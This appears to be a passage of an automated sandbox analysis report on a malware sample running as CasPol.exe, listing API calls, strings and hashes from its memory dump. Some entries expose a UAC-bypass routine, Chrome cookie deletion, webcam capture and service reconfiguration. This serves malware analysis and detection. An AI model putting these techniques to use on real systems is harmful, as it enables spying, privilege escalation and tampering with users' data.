                                                                                                • Instruction ID: 7ed93d3ebd4d115a7197ccd8f2df160251767479400bef64a6787df62d4369c8
                                                                                                • Opcode Fuzzy Hash: ef47ebfd30ef03e85a2a2421afb1dda82fcc5287308f7bd369ee109742c52a19
                                                                                                • Instruction Fuzzy Hash: 29215C31A1410966CB04F7B2CCA69EE7764AE94318F40013FA902771D2EF789A4986DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cfbae8f3dcd2e5f3bdf3bcee8d3106cebccc1d81cd58107c476234e6777acd1f
                                                                                                • Instruction ID: 890753aa9dfb888b2a1585f98a5e225511b13b718af609ae416a1884f745cca0
                                                                                                • Opcode Fuzzy Hash: cfbae8f3dcd2e5f3bdf3bcee8d3106cebccc1d81cd58107c476234e6777acd1f
                                                                                                • Instruction Fuzzy Hash: 3A112472504A15BFDB206F729C08D3B3AACEB82736F20016EFC15D7282DE38C800C669
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FCD4
                                                                                                • int.LIBCPMT ref: 0040FCE7
                                                                                                  • Part of subcall function 0040CFB3: std::_Lockit::_Lockit.LIBCPMT ref: 0040CFC4
                                                                                                  • Part of subcall function 0040CFB3: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CFDE
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FD23
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FD49
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FD65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: xkG
                                                                                                • API String ID: 2536120697-3406988965
                                                                                                • Opcode ID: 4b6f72b1e0d08092fd2688f9826419a51511b3482868562e895aff95ac9ad519
                                                                                                • Instruction ID: 7cf641d0f45d7e480cf6c67891cb53e845b1d2cd586d61112ae60f6436568b55
                                                                                                • Opcode Fuzzy Hash: 4b6f72b1e0d08092fd2688f9826419a51511b3482868562e895aff95ac9ad519
                                                                                                • Instruction Fuzzy Hash: 3B11F032900119A7CB14FBA5D8429DEB7689E55358F10013BF809B72D1EB3CAF49C7D9
                                                                                                APIs
                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                APIs
                                                                                                  • Part of subcall function 0044FC32: _free.LIBCMT ref: 0044FC5B
                                                                                                • _free.LIBCMT ref: 0044FF39
                                                                                                  • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                                                                  • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                                                                • _free.LIBCMT ref: 0044FF44
                                                                                                • _free.LIBCMT ref: 0044FF4F
                                                                                                • _free.LIBCMT ref: 0044FFA3
                                                                                                • _free.LIBCMT ref: 0044FFAE
                                                                                                • _free.LIBCMT ref: 0044FFB9
                                                                                                • _free.LIBCMT ref: 0044FFC4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                • Instruction ID: 7d3bb130547cbd64d3bc6acdbb054c191a8682768e3bc5df2cfa43195c7f437f
                                                                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                • Instruction Fuzzy Hash: 3611603158175CAAE930B7B2CC87FCB779CFF01744F804C2EB69B66052DA2CB90A5655
                                                                                                APIs
                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406835
                                                                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004669B0,00000000), ref: 004067E9
                                                                                                • CoUninitialize.OLE32 ref: 0040688E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                • API String ID: 3851391207-2637227304
                                                                                                • Opcode ID: f62f8ea22737c4132ff5b3dac93a03cf3a5d885852b0606909ed978fbfad8032
                                                                                                • Instruction ID: bf5204b976fdd256b066cceb308157ad377b3c08e3874fea13dbf5f4dff6080c
                                                                                                • Opcode Fuzzy Hash: f62f8ea22737c4132ff5b3dac93a03cf3a5d885852b0606909ed978fbfad8032
                                                                                                • Instruction Fuzzy Hash: F20180722023117FE2287B21DC0EF7B6658DB4176AF12413FF946A71C1EAA9AC014679
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FFB7
                                                                                                • int.LIBCPMT ref: 0040FFCA
                                                                                                  • Part of subcall function 0040CFB3: std::_Lockit::_Lockit.LIBCPMT ref: 0040CFC4
                                                                                                  • Part of subcall function 0040CFB3: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CFDE
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00410006
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0041002C
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00410048
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                • String ID: pmG
                                                                                                • API String ID: 2536120697-2472243355
                                                                                                • Opcode ID: 49ddf8ddb094ef95c775291761389dec69e80ba720e56a3ba1433f00512a79dc
                                                                                                • Instruction ID: 7757f8b08a06b45aa46d7f93aac2e311949306114fe400d1b3bff67def6a62fd
                                                                                                • Opcode Fuzzy Hash: 49ddf8ddb094ef95c775291761389dec69e80ba720e56a3ba1433f00512a79dc
                                                                                                • Instruction Fuzzy Hash: D911B231900419EBCB14FBA5D9429DD7B689E58358F10016FF40567191EB78AF86C789
                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                Strings
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                • UserProfile, xrefs: 0040B2B4
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: 72896e415679114e8f7564b4c39e723e6cbc63ebcef2b2b336a3937c9eef69c1
                                                                                                • Instruction ID: 9d7a183bab8cffc7e176200adf3036985cfece21d6991fc3b8afe8d0fe8b9813
                                                                                                • Opcode Fuzzy Hash: 72896e415679114e8f7564b4c39e723e6cbc63ebcef2b2b336a3937c9eef69c1
                                                                                                • Instruction Fuzzy Hash: AB01623565010557CB0477B6DD6B9AF3628ED51718B60013FF802771E2FE3A990586DE
                                                                                                APIs
                                                                                                • __allrem.LIBCMT ref: 00439999
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004399B5
                                                                                                • __allrem.LIBCMT ref: 004399CC
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004399EA
                                                                                                • __allrem.LIBCMT ref: 00439A01
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00439A1F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1992179935-0
                                                                                                • Opcode ID: 4efdbcc0c18ee54ac68ca5eeaaf0c44e4d5513ad220f482322a7d0abd8bbf2ec
                                                                                                • Instruction ID: 5399b0f9a6461ae69e9bde9777a653eaf6085cdcce353b40ae7049a42401d5b7
                                                                                                • Opcode Fuzzy Hash: 4efdbcc0c18ee54ac68ca5eeaaf0c44e4d5513ad220f482322a7d0abd8bbf2ec
                                                                                                • Instruction Fuzzy Hash: 15810B72A00706ABE724BA79CC41B6B73E89F89768F24522FF411D7781E7B8DD008758
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1414292761-0
                                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __cftoe
                                                                                                • String ID:
                                                                                                • API String ID: 4189289331-0
                                                                                                • Opcode ID: 59a84199312040bebd3b7080c8be9dd535ae7880d2ee6b6a8de25d9cd02a2692
                                                                                                • Instruction ID: 890c16c57639ce4616fdae23c1b2cf08611ffd87950db76db0bf4773250d0152
                                                                                                • Opcode Fuzzy Hash: 59a84199312040bebd3b7080c8be9dd535ae7880d2ee6b6a8de25d9cd02a2692
                                                                                                • Instruction Fuzzy Hash: 2C512972900205ABFB249BA98C41FAF77A9EFC8324F24411FF815D6292DB3DDD11966C
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: H_prologSleep
                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                • API String ID: 3469354165-3054508432
                                                                                                • Opcode ID: 916136fd446a9b20b338680c405cf87cd35ad1897b3ae95691656e6ebb5e54f5
                                                                                                • Instruction ID: 0fabaa65846f565374d927adde4572b2cc1454b627dc53539f04e4ca1ee376cc
                                                                                                • Opcode Fuzzy Hash: 916136fd446a9b20b338680c405cf87cd35ad1897b3ae95691656e6ebb5e54f5
                                                                                                • Instruction Fuzzy Hash: 4641B031A0420196C614FF75C956AAD3BA59B81708F00453FF809A72E6DF7C9A85C7CF
                                                                                                APIs
                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                • String ID:
                                                                                                • API String ID: 1922816806-0
                                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                APIs
                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 3594823470-0
                                                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 00419FF2
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A006
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A013
                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,004196FD), ref: 0041A048
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A05A
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,004196FD,00000000,00000000), ref: 0041A05D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                • String ID:
                                                                                                • API String ID: 493672254-0
                                                                                                • Opcode ID: b1d06779e49364f5efd1e1156e42b495588f4c67c2645d9207e201a63b841c04
                                                                                                • Instruction ID: 3721d8981427c9c50277447f2eb78ca90bee9705940f35750f03ddb94c099399
                                                                                                • Opcode Fuzzy Hash: b1d06779e49364f5efd1e1156e42b495588f4c67c2645d9207e201a63b841c04
                                                                                                • Instruction Fuzzy Hash: 28016D315062107ED2111F349C0EEBF3E1CDF567B1F00022FF522A22D2DE69CE8981AA
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0043800D,004379C1), ref: 00438024
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438032
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043804B
                                                                                                • SetLastError.KERNEL32(00000000,?,0043800D,004379C1), ref: 0043809D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: 3d2ceef5274e4dce0ae2caf7dfaf84fccaef2f9a96c7b33c4be4e75810a8a5f0
                                                                                                • Instruction ID: c897193d57ecee64636fe05851fbd3cadc70b6e754ca2b2668497838eaebe06c
                                                                                                • Opcode Fuzzy Hash: 3d2ceef5274e4dce0ae2caf7dfaf84fccaef2f9a96c7b33c4be4e75810a8a5f0
                                                                                                • Instruction Fuzzy Hash: DC0190321083416DFB2823756C465377B68E709378F21123FF328515F1EF994C44514C
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                                                • _free.LIBCMT ref: 10005B2D
                                                                                                • _free.LIBCMT ref: 10005B55
                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
                                                                                                • SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                                                • _abort.LIBCMT ref: 10005B74
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 3160817290-0
                                                                                                • Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                • Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
                                                                                                • Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
                                                                                                • Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                • _free.LIBCMT ref: 00447106
                                                                                                • _free.LIBCMT ref: 0044712E
                                                                                                • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 0044713B
                                                                                                • SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                • _abort.LIBCMT ref: 0044714D
                                                                                                Memory Dump Source
